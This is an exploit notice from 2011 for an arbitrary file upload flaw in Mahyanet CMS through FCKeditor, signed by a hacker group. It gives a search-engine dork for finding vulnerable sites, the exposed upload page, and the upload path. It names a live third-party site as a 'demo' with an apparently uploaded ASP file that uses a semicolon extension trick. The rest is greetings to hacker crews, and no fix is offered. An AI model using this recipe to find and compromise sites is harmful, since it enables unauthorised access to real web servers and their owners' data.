--------------------------------------------------------------------------------
@ Mahyanet Cms (FCKeditor) Arbitary File Upload Vulnerability
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
@ Name: Mahyanet Cms (FCKeditor) Arbitary File Upload Vulnerability
@ Vendor: http://mahyanet.com
@ Date: 2011-07-04
@ Author: Ashiyane Digital Security Team
@ Thanks to: 1337day.com,Securityreason.com,packetstormsecurity.com,Exploit-db.com
@ Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
@ Home: www.ashiyane.org/forums/
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[+] Dork: intext:"Powered by : Mahyanet.com" 
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[+] Vulnerabilities ~>

[+] Vulnerability: http://127.0.0.1/Mahyanet/fckeditor/editor/filemanager/connectors/test.html

[+] Uploaded Path: http://127.0.0.1/Mahyanet/fckeditor/editor/images/userfiles/file/[Your File]

[+] Demo : http://www.tanhadairy.com/fckeditor/editor/images/userfiles/file/he.asp;(1)(1).txt
--------------------------------------------------------------------------------
===========================================================================
@ Gr33tz:
@ Ashiyane Members :
@ BehroozIce,Q7,Virangar,Iman_taktaz,Keivan,Ali_eagle,ruin3r,Hijacker,Rz04
@ Taghva,M3QD4D,PrinceOfHacking,Hidden-Hunter,Root3r,elvator,unique2world
@ Gladiator,Wahid,Encoder,mmilad200,n3me3iz,Classic,r3d.z0n3,injector,fr0nk
@ mzhacker,zend,milad-bushehr,aliakh,__amir__,anti206
@ 1337 Member: 
@ r0073r,Side^effects,r4dc0re,eidelweiss,SeeMe,agix,gunslinger
@ Sn!pEr.S!te,indoushka,Knockout,ZoRlu,AnT!-Tr0J4n,eXeSoul,
===========================================================================
<<./By XroGuE >>